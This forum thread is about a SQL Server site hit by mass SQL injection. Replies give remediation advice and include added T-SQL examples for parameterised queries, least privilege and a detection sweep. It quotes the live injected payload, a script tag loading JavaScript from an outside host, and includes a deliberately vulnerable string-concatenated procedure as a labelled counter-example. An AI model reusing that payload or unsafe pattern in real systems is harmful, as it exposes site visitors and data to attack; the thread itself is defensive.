injection attack
saeed_edp (Forum Newbie)
Please help me!
I'm under an injection attack and I don't know what I can do.
This script '<script src=http://www.hdadwcd.com/b.js></script>' has been injected into my database (SQL Server 2000).
It was not only injected into many database fields but also renamed my publication to:
"publication name <script src=http://www.hdadwcd.com/b.js></script>"
How can I repair it and stop this injection?
How can I edit the binary fields in MSrepl_commands and delete this script from the command field?
GilaMonster (SSC Guru)
You need to find the application that is vulnerable to injection (you can use profiler to see the commands coming to the database)

There isn't a quick silver bullet on this. You need to find the vulnerable pages and fix them. Change SQL statements to parameterised rather than built up. Restrict the app's permissions to not allow it to directly access the tables but to use stored procs.

I would suggest that you drop the publication in question and recreate it.

Gail Shaw
Microsoft Certified Master: SQL Server, MVP, M.Sc (Comp Sci)
SQL In The Wild: Discussions on DB performance with occasional diversions into recoverability

We walk in the dark places no others will enter
We stand on the bridge and no one may pass
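As an added example, not code from this thread or from any poster: the two fixes Gail describes (parameterised statements instead of built-up ones, and an application account that can only execute procedures) expressed in T-SQL. dbo.Products, AppLogin and AppUser are hypothetical names; the syntax is kept SQL Server 2000 compatible where possible.

```sql
-- Added example (not from the thread): Gail's two fixes expressed in T-SQL.
-- dbo.Products, AppLogin and AppUser are hypothetical names; syntax is kept
-- SQL Server 2000 compatible where possible (no MAX types, no DECLARE-with-initialiser).

-- BEFORE: the search term is concatenated into the statement, so whatever the
-- web page passes in becomes part of the SQL text and is executed as code.
CREATE PROCEDURE dbo.SearchProducts_Unsafe @Search nvarchar(100)
AS
BEGIN
    DECLARE @sql nvarchar(4000);
    SET @sql = N'SELECT ProductID, ProductName FROM dbo.Products '
             + N'WHERE ProductName LIKE ''%' + @Search + N'%''';
    EXEC (@sql);
END
GO

-- AFTER: the statement text is constant and the value arrives as a typed
-- parameter; the engine can only ever compare it, never parse it.
CREATE PROCEDURE dbo.SearchProducts @Search nvarchar(100)
AS
BEGIN
    SELECT ProductID, ProductName
    FROM dbo.Products
    WHERE ProductName LIKE N'%' + @Search + N'%';
END
GO

-- Where dynamic SQL genuinely cannot be avoided, keep the same rule: fixed
-- statement text plus sp_executesql parameters, never string-built values.
CREATE PROCEDURE dbo.SearchProducts_Dynamic @Search nvarchar(100)
AS
BEGIN
    DECLARE @sql nvarchar(4000);
    SET @sql = N'SELECT ProductID, ProductName FROM dbo.Products '
             + N'WHERE ProductName LIKE N''%'' + @p + N''%''';
    EXEC sp_executesql @sql, N'@p nvarchar(100)', @p = @Search;
END
GO

-- Least privilege: the application login may execute the procedures only.
-- Ownership chaining (procedure and table both owned by dbo) lets the
-- procedure read dbo.Products without the app holding any table permission,
-- so an injected statement cannot issue the mass UPDATE seen in this thread.
CREATE USER AppUser FOR LOGIN AppLogin;   -- SQL 2005+; SQL 2000 uses sp_grantdbaccess
GRANT EXECUTE ON dbo.SearchProducts TO AppUser;
GRANT EXECUTE ON dbo.SearchProducts_Dynamic TO AppUser;
-- deliberately no GRANT SELECT / UPDATE on dbo.Products
```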


bitbucket-25253 (SSCertifiable)
When reading this, scroll up to the top of this page; in the upper frame you will see Search: type in the word "injection" (without the quotes) and then click the button labelled Go. And be prepared to read a vast amount of information concerning your problem and some recommended solutions from articles and forums here on SQLServerCentral.

If everything seems to be going well, you have obviously overlooked something.

Ron

Please help us, help you -before posting a question please read

Before posting a performance problem please read
saeed_edp (Forum Newbie)
Hi
Thank you for your last reply.
I resolved that problem by editing all tables and removing that script.
I think it was a new injection method.
This link was helpful:
http://www.msblog.org/index.php?s=yp
http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx

But I couldn't resolve a part of the problem:
There were many binary fields in MSrepl_commands containing the bad script.
I deleted them because I couldn't edit them.
I would be pleased to be taught how to edit the MSrepl_commands command field and alter its data.
Yours truly
saeed.
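Saeed describes editing every affected table by hand. As an added example, not code from the thread or from any poster, here is a detection sweep that enumerates every character column in the current database containing an injected `<script ... src=` fragment, so the affected columns can be listed before any clean-up. It uses only SQL Server 2000 features (INFORMATION_SCHEMA, nvarchar(4000)); text/ntext columns are deliberately skipped because LIKE and REPLACE behave differently on them and they need a separate pass. MSrepl_commands is not touched, following Gail's advice to drop and recreate replication instead.

```sql
-- Added example (not from the thread): report every char/varchar/nchar/nvarchar
-- column in the database that contains an injected <script ... src= fragment.
-- Detection only: no data is changed. SQL Server 2000 compatible.
SET NOCOUNT ON;

DECLARE @Marker nvarchar(100);
SET @Marker = N'%<script%src=%';           -- constructed marker, matches the thread's payload shape

DECLARE @Schema sysname, @Table sysname, @Column sysname, @sql nvarchar(4000);

CREATE TABLE #Hits (SchemaName sysname, TableName sysname, ColumnName sysname, RowsHit int);

-- Character columns of user tables only; text/ntext are skipped (see lead-in).
DECLARE cols CURSOR FAST_FORWARD FOR
    SELECT c.TABLE_SCHEMA, c.TABLE_NAME, c.COLUMN_NAME
    FROM INFORMATION_SCHEMA.COLUMNS c
    JOIN INFORMATION_SCHEMA.TABLES t
      ON t.TABLE_SCHEMA = c.TABLE_SCHEMA AND t.TABLE_NAME = c.TABLE_NAME
    WHERE t.TABLE_TYPE = 'BASE TABLE'
      AND c.DATA_TYPE IN ('char', 'varchar', 'nchar', 'nvarchar');

OPEN cols;
FETCH NEXT FROM cols INTO @Schema, @Table, @Column;
WHILE @@FETCH_STATUS = 0
BEGIN
    -- Identifiers come from the catalog, not from users, and are still quoted;
    -- the search value itself travels as an sp_executesql parameter.
    SET @sql = N'INSERT #Hits SELECT @s, @t, @c, COUNT(*) FROM '
             + QUOTENAME(@Schema) + N'.' + QUOTENAME(@Table)
             + N' WHERE ' + QUOTENAME(@Column) + N' LIKE @m';
    EXEC sp_executesql @sql,
         N'@s sysname, @t sysname, @c sysname, @m nvarchar(100)',
         @Schema, @Table, @Column, @Marker;
    FETCH NEXT FROM cols INTO @Schema, @Table, @Column;
END
CLOSE cols;
DEALLOCATE cols;

-- Columns with at least one affected row, in a stable order for a clean-up plan.
SELECT SchemaName, TableName, ColumnName, RowsHit
FROM #Hits
WHERE RowsHit > 0
ORDER BY SchemaName, TableName, ColumnName;

DROP TABLE #Hits;
```

Run it against a restored copy first; a column that legitimately stores HTML will also match and should be reviewed rather than blindly cleaned.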
GilaMonster (SSC Guru)
The safest fix is probably to completely drop the replication and recreate it.



britinusa (Grasshopper)
Wow, this is an old thread but still very pertinent.

We are rapidly migrating to SQL 2005.

But we were attacked by injection ... every varchar field in every table replaced with similar .js crap. We restored and the world was good.

But we're trying to find the vulnerability ... of the publicly visible pages on the site (only 5 or 6), all are derived with stored procs and/or our own in-house brewed trap.

We are told that SQL 2005 and SQL 2008 handle SQL injections far better.

We are also about to, within a month, implement a proper SQL Server 2005 mirror. But of course mirrors will merely mirror the injection; right?

I'm babbling ... but beyond stored procs and home-grown filters, are there any other known hardware or software remedies?

You refer to a profiler to see commands ... where is that?
GilaMonster (SSC Guru)
Can you post this in a new thread please?



britinusa (Grasshopper)
Sorry .. by all means .. I'm new here ... my bad.

A new thread or somewhere you'd prefer?

Robert
GilaMonster (SSC Guru)
New thread in the appropriate forum. Probably SQL 2005 T-SQL. Some people will look at a thread with lots of replies and not check it, assuming it's answered already.



britinusa (Grasshopper)
Ok, will do BUT ... the main gist of this post was your mention of the "profiler"?
We are trying to determine the vulnerability?